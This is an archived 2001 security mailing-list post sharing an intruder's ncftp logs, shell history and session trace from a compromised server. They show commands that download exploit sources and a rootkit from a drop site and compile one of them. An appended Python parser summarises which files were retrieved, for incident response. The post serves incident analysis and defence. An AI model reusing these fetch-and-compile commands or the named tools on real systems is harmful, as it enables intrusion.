Re: Hacked using vulnerable FTP daemon.

From: Paul Tan (paul.tanat_private)
Date: Wed Sep 26 2001 - 00:42:55 PDT


    For all those interested in some logs,
    
    This cracker has compromised another website - http://www.ac.ac.th/default.htm
    
    
    Logs of commands issued by cracker using ncftp: -
    
    LOG - unmodified
    
    topcities.com at Sun Sep 23 18:00:36 2001
      get ftp://accessftp:PASSWORDat_private/su.c
    topcities.com at Sun Sep 23 18:44:41 2001
    topcities.com at Sun Sep 23 18:50:06 2001
      get ftp://accessftp:PASSWORDat_private/bsd.c
      get ftp://accessftp:PASSWORDat_private/redhat.c
      get ftp://accessftp:PASSWORDat_private/lpd.c
      get ftp://accessftp:PASSWORDat_private/bsd-x.c
      get ftp://accessftp:PASSWORDat_private/aix.c
      get ftp://accessftp:PASSWORDat_private/apache.c
      get ftp://accessftp:PASSWORDat_private/imapd.c
      get ftp://accessftp:PASSWORDat_private/remove.c
      get ftp://accessftp:PASSWORDat_private/rip.c
    topcities.com at Sun Sep 23 19:59:46 2001
      get ftp://accessftp:PASSWORDat_private/wuftpd-god.c
    topcities.com at Mon Sep 24 09:51:01 2001
    topcities.com at Mon Sep 24 14:07:33 2001
    topcities.com at Mon Sep 24 19:37:30 2001
      get ftp://accessftp:PASSWORDat_private/zone-pre
      get ftp://accessftp:PASSWORDat_private/SEClpd.c
      get ftp://accessftp:PASSWORDat_private/t666.c
    
    HISTORY - unmodified
    
    get su.c
    quit
    ls
    get su.c
    quit
    ls
    quit
    ls
    get su.c
    gcc -o su su.c
    quit
    ls
    get bsd.c
    get redhat.c
    get lpd.c
    get bsd-x..c
    get bsd-x.c
    getaix.c
    get aix.c
    get apache.c
    get imapd.c
    get  remove.c
    get rip.c
    get rpc.autofsd.c
    get wu-scan.c
    quit
    get wu.c
    ls
    get wuftpd-god.c
    quit
    ls
    exit
    ls
    get zone-pre
    get SEClpd
    get SEClpd.c
    get t666.c
    get rpc.c
    quit
    
    [root@www .ncftp]# vi trace                                             
                        -- modified to protect someone
    SESSION STARTED at:  Mon Sep 24 19:37:15 2001
       Program Version:  NcFTP 3.0.0/354 October 04 1999, 04:17 AM
       Library Version:  LibNcFTP 3.0b3 (October 2, 1999)
            Process ID:  13472
              Platform:  linux-x86
                 Uname:  Linux|www.COMPROMISED.com.sg|2.2.14-5.0smp|#1 SMP 
    Tue Mar 7 21:01:40 EST 2000|i686^M
              Hostname:  www.COMPROMISED.com.sg  (rc=2)
    19:37:15  Fw: firewall.COMPROMISED.com.sg  Type: 0  User: jogja  Pass: 
    ********  Port: 21
    19:37:15  FwExceptions: .COMPROMISED.com.sg,localhost,localdomain
    19:37:15  Resolving topcities.com...
    19:37:16  Connecting to 64.152.192.119...
    19:37:17  Remote server is running NcFTPd.
    19:37:17  Logging in...
    19:37:17  220: topcities.com NcFTPd Server (licensed copy) ready.
    19:37:17  Connected to 64.152.192.119.
    19:37:17  Cmd: USER accessftp
    19:37:28  331: User accessftp okay, need password.
    19:37:28  Cmd: PASS xxxxxxxx
    19:37:29  Logging in...
    19:37:29  230: 
    #######################################################################
    19:37:29       
    #######################################################################
    19:37:29
    19:37:29       Welcome, accessftp.  You are now logged into your account.
    19:37:29
    19:37:29       Your web site address: http://accessftp.topcities.com
    19:37:29       You are connected from IP Address: [COMPROMISED HOST IP]
    19:37:29       Space limit for your account: 153600000 bytes
    19:37:29       Space used: 5377648 bytes
    19:37:29       Maximum per-file size: 900 Kb
    19:37:29       Upload bandwidth limit: 5 kB/sec
    19:37:29       Download bandwidth limit: 2 kB/sec
    19:37:29       PT: 0.20
    19:37:29
    19:37:29       Note:  Please do not exceed your account quota by 
    uploading files
    19:37:29       larger than 900Kb or exceeding your space limit.  If you 
    do, subsequent
    19:37:29       uploads will be unsucessful without notice to you.
    19:37:29
    19:37:29       
    #######################################################################
    19:37:29       
    #######################################################################
    19:37:29
    19:37:29
    19:37:29
    19:37:29       Restricted user logged in.
    19:37:29  Cmd: PWD
    19:37:29  257: "/" is cwd.
    19:37:29  Logged in to 64.152.192.119 as accessftp.
    19:37:29  Cmd: FEAT
    19:37:30  211: Extensions supported:
    19:37:30        CLNT
    19:37:30        MDTM
    19:37:30        MLST 
    type*;size*;modify*;UNIX.mode*;UNIX.owner;UNIX.uid;UNIX.group;UNIX.gid;unique
    19:37:30        PASV
    19:37:30        REST STREAM
    19:37:30        SIZE
    19:37:30        TVFS
    19:37:30        Compliance Level: 19981201 (IETF mlst-05)
    19:37:30       End.
    19:37:30  Cmd: HELP SITE
    19:37:30  214: The following SITE commands are recognized:
    19:37:30
    19:37:30  Logged in to topcities.com.
    19:37:30  Cmd: CLNT NcFTP 3.0.0 linux-x86
    19:37:31  200: Noted.
    19:37:42  > ls
    
    19:37:42  Cmd: OPTS MLST 
    type;size;modify;UNIX.mode;UNIX.owner;UNIX.uid;UNIX.group;UNIX.gid
    19:37:42  200: Options accepted: 
    type;size;modify;UNIX.mode;UNIX.uid;UNIX.gid
    19:37:42  Cmd: PASV
    19:37:42  227: Entering Passive Mode (64,152,192,119,11,87)
    19:37:43  Cmd: MLSD
    19:37:43  150: Data connection accepted from [COMPROMISED HOST IP]:3758; 
    transfer starting.
    19:37:44  226: Listing completed.
    19:37:44  Remote listing contents {
    19:37:44      
    type=cdir;modify=20010923154433;UNIX.mode=0777;UNIX.uid=99;UNIX.gid=99 /
    19:37:44      
    type=file;size=229995;modify=20010918134314;UNIX.mode=0644;UNIX.uid=99;UNIX.gid=99 
    GaP.tcl
    19:37:44      
    type=dir;modify=20010922190607;UNIX.mode=0755;UNIX.uid=99;UNIX.gid=99 IIS
    19:37:44      
    type=file;size=9911;modify=20010918055419;UNIX.mode=0644;UNIX.uid=99;UNIX.gid=99 
    SEClpd.c
    19:37:44      
    type=file;size=44356;modify=20010915112702;UNIX.mode=0644;UNIX.uid=99;UNIX.gid=99 
    VBTERM.ZIP
    19:37:44      
    type=dir;modify=20010818023652;UNIX.mode=0777;UNIX.uid=99;UNIX.gid=99 _data
    19:37:44      
    type=file;size=3543;modify=20010923093715;UNIX.mode=0644;UNIX.uid=99;UNIX.gid=99 
    aix.c
    19:37:44      
    type=file;size=55871;modify=20010911095825;UNIX.mode=0644;UNIX.uid=99;UNIX.gid=99 
    allchan.tcl
    19:37:44      
    type=file;size=6242;modify=20010915094640;UNIX.mode=0644;UNIX.uid=99;UNIX.gid=99 
    amountdexp.zip
    19:37:44      
    type=file;size=3066;modify=20010923094606;UNIX.mode=0644;UNIX.uid=99;UNIX.gid=99 
    apache.c
    19:37:44      
    type=file;size=5241;modify=20010911102601;UNIX.mode=0644;UNIX.uid=99;UNIX.gid=99 
    ascii.tcl
    19:37:44      
    type=file;size=24973;modify=20010919175706;UNIX.mode=0644;UNIX.uid=99;UNIX.gid=99 
    bsd-x.c
    19:37:44      
    type=file;size=25979;modify=20010913114244;UNIX.mode=0644;UNIX.uid=99;UNIX.gid=99 
    bsd.c
    19:37:44      
    type=file;size=53057;modify=20010911102624;UNIX.mode=0644;UNIX.uid=99;UNIX.gid=99 
    fonts.txt
    19:37:44      
    type=dir;modify=20010917133407;UNIX.mode=0755;UNIX.uid=99;UNIX.gid=99 ftp
    19:37:44      
    type=file;size=3626;modify=20010911090829;UNIX.mode=0644;UNIX.uid=99;UNIX.gid=99 
    host.tcl
    19:37:44      
    type=file;size=3332;modify=20010915102000;UNIX.mode=0644;UNIX.uid=99;UNIX.gid=99 
    imapd.c
    19:37:44      
    type=file;size=2886;modify=20010919011110;UNIX.mode=0644;UNIX.uid=99;UNIX.gid=99 
    index.htm
    19:37:44      
    type=file;size=1784;modify=20010922040601;UNIX.mode=0644;UNIX.uid=99;UNIX.gid=99 
    loadnc.asp
    19:37:44      
    type=file;size=2516;modify=20010911121619;UNIX.mode=0644;UNIX.uid=99;UNIX.gid=99 
    lpd.c
    19:37:44      
    type=file;size=3726;modify=20010918075807;UNIX.mode=0644;UNIX.uid=99;UNIX.gid=99 
    named.htm
    19:37:44      
    type=file;size=75482;modify=20010919130336;UNIX.mode=0644;UNIX.uid=99;UNIX.gid=99 
    nc110.tgz
    19:37:44      
    type=file;size=2003;modify=20010911095755;UNIX.mode=0644;UNIX.uid=99;UNIX.gid=99 
    ns.tcl
    19:37:44      
    type=file;size=7127;modify=20010917160516;UNIX.mode=0644;UNIX.uid=99;UNIX.gid=99 
    oftpd.tar.gz
    19:37:44      
    type=file;size=689;modify=20010915095601;UNIX.mode=0644;UNIX.uid=99;UNIX.gid=99 
    p3-sunos.tar.gz
    19:37:44      
    type=file;size=29;modify=20010911180121;UNIX.mode=0644;UNIX.uid=99;UNIX.gid=99 
    ps.txt
    19:37:44      
    type=file;size=87;modify=20010911103054;UNIX.mode=0644;UNIX.uid=99;UNIX.gid=99 
    psy.txt
    19:37:44      
    type=file;size=197126;modify=20010905125107;UNIX.mode=0644;UNIX.uid=99;UNIX.gid=99 
    psyBNC2.2.tar.gz
    19:37:44      
    type=file;size=5181;modify=20010923104845;UNIX.mode=0644;UNIX.uid=99;UNIX.gid=99 
    redhat.c
    19:37:44      
    type=file;size=5101;modify=20010923164829;UNIX.mode=0644;UNIX.uid=99;UNIX.gid=99 
    remove.c
    19:37:44      
    type=file;size=5553;modify=20010911123908;UNIX.mode=0644;UNIX.uid=99;UNIX.gid=99 
    rip.c
    19:37:44      
    type=file;size=2721;modify=20010923130108;UNIX.mode=0644;UNIX.uid=99;UNIX.gid=99 
    rkit.tar.gz
    19:37:44      
    type=file;size=3341;modify=20010912062001;UNIX.mode=0644;UNIX.uid=99;UNIX.gid=99 
    rpc.autofsd.c
    19:37:44      
    type=file;size=2837;modify=20010923151532;UNIX.mode=0644;UNIX.uid=99;UNIX.gid=99 
    rpc.c
    19:37:44      
    type=file;size=2924;modify=20010912055334;UNIX.mode=0644;UNIX.uid=99;UNIX.gid=99 
    rpcBSD.tar.gz
    19:37:44      
    type=file;size=19119;modify=20010911125301;UNIX.mode=0644;UNIX.uid=99;UNIX.gid=99 
    statdx.c
    19:37:44      
    type=file;size=11990;modify=20010911121600;UNIX.mode=0644;UNIX.uid=99;UNIX.gid=99 
    su.c
    19:37:44      
    type=file;size=7394;modify=20010922100655;UNIX.mode=0644;UNIX.uid=99;UNIX.gid=99 
    sunbrute.c
    19:37:44      
    type=file;size=19809;modify=20010912055508;UNIX.mode=0644;UNIX.uid=99;UNIX.gid=99 
    t666.c
    19:37:44      
    type=file;size=242007;modify=20010921110904;UNIX.mode=0644;UNIX.uid=99;UNIX.gid=99 
    tel.zip
    19:37:44      
    type=file;size=2502;modify=20010919184357;UNIX.mode=0644;UNIX.uid=99;UNIX.gid=99 
    unicode.txt
    19:37:44      
    type=file;size=145408;modify=20010921111014;UNIX.mode=0644;UNIX.uid=99;UNIX.gid=99 
    unzip.exe
    19:37:44      
    type=file;size=492;modify=20010922040606;UNIX.mode=0644;UNIX.uid=99;UNIX.gid=99 
    upload.asp
    19:37:44      
    type=file;size=5867;modify=20010922040613;UNIX.mode=0644;UNIX.uid=99;UNIX.gid=99 
    upload.inc
    19:37:44      
    type=file;size=2095;modify=20010918063433;UNIX.mode=0644;UNIX.uid=99;UNIX.gid=99 
    wu-scan.c
    19:37:44      
    type=file;size=20964;modify=20010918085052;UNIX.mode=0644;UNIX.uid=99;UNIX.gid=99 
    wuftpd-god.c
    19:37:44      
    type=file;size=19343;modify=20010913115048;UNIX.mode=0644;UNIX.uid=99;UNIX.gid=99 
    wuftpd.c
    19:37:44      
    type=file;size=10244;modify=20010923154437;UNIX.mode=0644;UNIX.uid=99;UNIX.gid=99 
    zone-pre
    19:37:44  }
    19:37:44  aix.c              IIS/               psy.txt            t666.c
    19:37:44  allchan.tcl        imapd.c            redhat.c           tel.zip
    19:37:44  amountdexp.zip     index.htm          remove.c           
    unicode.txt
    19:37:44  apache.c           loadnc.asp         rip.c              unzip.exe
    19:37:44  ascii.tcl          lpd.c              rkit.tar.gz        
    upload.asp
    19:37:44  bsd.c              named.htm          rpc.autofsd.c      
    upload.inc
    19:37:44  bsd-x.c            nc110.tgz          rpcBSD.tar.gz      
    VBTERM.ZIP
    19:37:44  _data/             ns.tcl             rpc.c              wuftpd.c
    19:37:44  fonts.txt          oftpd.tar.gz       SEClpd.c           
    wuftpd-god.c
    19:37:44  ftp/               p3-sunos.tar.gz    statdx.c           wu-scan.c
    19:37:44  GaP.tcl            ps.txt             su.c               zone-pre
    19:37:44  host.tcl           psyBNC2.2.tar.gz   sunbrute.c
    19:38:01  > get zone-pre
    
    19:38:01  Cmd: TYPE I
    19:38:01  200: Type okay.
    19:38:01  Cmd: MLST zone-pre
    19:38:02  250: Begin
    19:38:02        
    type=file;size=10244;modify=20010923154437;UNIX.mode=0644;UNIX.uid=99;UNIX.gid=99 
    /zone-pre
    19:38:02       End.
    19:38:02  Cmd: PASV
    19:38:02  227: Entering Passive Mode (64,152,192,119,11,88)
    19:38:02  Cmd: RETR zone-pre
    19:38:03  150: Data connection accepted from [COMPROMISED HOST IP]:3759; 
    transfer starting for zone-pre (10244 bytes).
    19:38:05  226: Transfer completed.
    19:38:29  > get SEClpd
    
    19:38:29  Cmd: MLST SEClpd
    19:38:30  550: No such file or directory.
    19:38:30  Cmd: SIZE SEClpd
    19:38:30  550: No such file.
    19:38:30  Cmd: PASV
    19:38:30  227: Entering Passive Mode (64,152,192,119,11,90)
    19:38:31  Cmd: RETR SEClpd
    19:38:31  550: No such file.
    19:38:39  > get SEClpd.c
    
    19:38:39  Cmd: MLST SEClpd.c
    19:38:39  250: Begin
    19:38:39        
    type=file;size=9911;modify=20010918055419;UNIX.mode=0644;UNIX.uid=99;UNIX.gid=99 
    /SEClpd.c
    19:38:39       End.
    19:38:39  Cmd: PASV
    19:38:42  227: Entering Passive Mode (64,152,192,119,11,91)
    19:38:42  Cmd: RETR SEClpd.c
    19:38:42  150: Data connection accepted from [COMPROMISED HOST IP]:3761; 
    transfer starting for SEClpd.c (9911 bytes).
    19:38:44  226: Transfer completed.
    19:39:36  > get t666.c
    
    19:39:36  Cmd: MLST t666.c
    19:39:37  250: Begin
    19:39:37        
    type=file;size=19809;modify=20010912055508;UNIX.mode=0644;UNIX.uid=99;UNIX.gid=99 
    /t666.c
    19:39:37       End.
    19:39:37  Cmd: PASV
    19:39:37  227: Entering Passive Mode (64,152,192,119,11,93)
    19:39:38  Cmd: RETR t666.c
    19:39:38  150: Data connection accepted from [COMPROMISED HOST IP]:3762; 
    transfer starting for t666.c (19809 bytes).
    19:39:41  226: Transfer completed.
    19:58:54  > get rpc.c
    
    19:58:54  Cmd: MLST rpc.c
    19:58:54  Remote host has closed the connection.
    19:58:54  421: Disconnecting you since you were inactive for 180 seconds.
    19:58:54  Passive mode refused.
    19:59:11  > quit
    
    SESSION ENDED at:    Mon Sep 24 19:59:11 2001
    
    
    
    ----------------------------------------------------------------------------
    This list is provided by the SecurityFocus ARIS analyzer service.
    For more information on this free incident handling, management 
    and tracking system please see: http://aris.securityfocus.com
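The trace quoted in the post is the raw evidence; what an incident handler wants from it is a list of which files the intruder actually pulled down, with the server-reported size and mtime of each, and which fetches failed or were cut off. The parser below does that for the NcFTP 3.x trace format shown in the post. It is an added example, not code from the original post or from NcFTP; the line shapes it recognises (`> get`, `Cmd: RETR`, three-digit server replies, MLST fact lines) are assumed from the quoted trace, and the embedded sample is an excerpt of that trace with wrapped lines re-joined.

```python
"""Retrieval timeline from an NcFTP 3.x trace file.

Hypothetical IR helper written for this archived post; not part of NcFTP. It
assumes the line shapes in the quoted trace: 'HH:MM:SS  > get name' (typed
command), 'HH:MM:SS  Cmd: RETR name' (client), 'HH:MM:SS  NNN: text' (server
reply, RFC 959 code) and 'HH:MM:SS   type=file;size=N;... /name' (MLST facts).
"""
import re
from dataclasses import dataclass
from typing import Optional

# Excerpt of the trace quoted in the post, re-joined where the mail archive
# wrapped long lines; "[COMPROMISED HOST IP]" is the poster's own redaction.
SAMPLE_TRACE = """\
19:38:01  > get zone-pre
19:38:01  Cmd: MLST zone-pre
19:38:02  250: Begin
19:38:02        type=file;size=10244;modify=20010923154437;UNIX.mode=0644;UNIX.uid=99;UNIX.gid=99 /zone-pre
19:38:02       End.
19:38:02  Cmd: PASV
19:38:02  227: Entering Passive Mode (64,152,192,119,11,88)
19:38:02  Cmd: RETR zone-pre
19:38:03  150: Data connection accepted from [COMPROMISED HOST IP]:3759; transfer starting for zone-pre (10244 bytes).
19:38:05  226: Transfer completed.
19:38:29  > get SEClpd
19:38:29  Cmd: MLST SEClpd
19:38:30  550: No such file or directory.
19:38:31  Cmd: RETR SEClpd
19:38:31  550: No such file.
19:58:54  > get rpc.c
19:58:54  Cmd: MLST rpc.c
19:58:54  Remote host has closed the connection.
19:58:54  421: Disconnecting you since you were inactive for 180 seconds.
"""

LINE_RE = re.compile(r"^(\d\d:\d\d:\d\d)\s+(.*)$")
REPLY_RE = re.compile(r"^(\d{3}): ?(.*)$")

@dataclass
class Transfer:
    name: str
    requested_at: str
    status: str = "pending"        # pending | completed | failed | aborted
    finished_at: Optional[str] = None
    size: Optional[int] = None     # from the MLST facts, if the server sent them
    modify: Optional[str] = None   # server-side mtime as YYYYMMDDhhmmss
    retr_sent: bool = False
    detail: str = ""               # server reply text on failure/abort

def parse_facts(body):
    """Split 'type=file;size=10244;...;UNIX.gid=99 /zone-pre' into (facts, path).

    NcFTPd puts no ';' after the last fact, so split on the first space rather
    than the last ';'; the pathname itself may contain spaces.
    """
    facts_str, _, path = body.partition(" ")
    # partition("=")[::2] -> (key, value)
    facts = dict(kv.partition("=")[::2] for kv in facts_str.rstrip(";").split(";"))
    return facts, path.strip()

def parse_trace(trace):
    """One Transfer per 'get' the user typed, resolved against the server replies."""
    transfers, current = [], None
    for raw in trace.splitlines():
        m = LINE_RE.match(raw)
        if not m:
            continue
        stamp, body = m.group(1), m.group(2).strip()
        if body.startswith("> get "):
            current = Transfer(name=body[6:].strip(), requested_at=stamp)
            transfers.append(current)
            continue
        if current is None or current.status != "pending":
            continue
        if body.startswith("type="):
            facts, path = parse_facts(body)
            if path.lstrip("/") == current.name:
                current.size = int(facts["size"]) if "size" in facts else None
                current.modify = facts.get("modify")
        elif body == "Cmd: RETR " + current.name:
            current.retr_sent = True
        elif (reply := REPLY_RE.match(body)):
            code, text = reply.groups()
            if code == "226":                              # data transfer finished
                current.status, current.finished_at = "completed", stamp
            elif code == "421":                            # server dropped the session
                current.status, current.finished_at, current.detail = "aborted", stamp, text
            elif code[0] in "45" and current.retr_sent:    # the RETR itself was refused
                current.status, current.finished_at, current.detail = "failed", stamp, text
            # a 4xx/5xx before RETR (e.g. a failed MLST probe) is not a failed transfer
    return transfers

def summarize(transfers):
    """Group file names by outcome, e.g. {'completed': ['zone-pre'], ...}."""
    out = {"completed": [], "failed": [], "aborted": [], "pending": []}
    for t in transfers:
        out[t.status].append(t.name)
    return out
```

Running `parse_trace` over the full `trace` file and `summarize` over the result gives the inventory of tools that actually landed on the host, which is what the rest of the investigation (file hashes, compile artefacts such as the `su` binary in the history, outbound connections) should be keyed on. The `modify` fact is the drop site's own mtime for the file, so it dates when the tool was staged there, not when it was fetched; the 550 on `MLST SEClpd` is deliberately not counted as a failed transfer, since the client went on to issue the `RETR` anyway and only that reply decides the outcome.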
    



    This archive was generated by hypermail 2b30 : Wed Sep 26 2001 - 08:25:37 PDT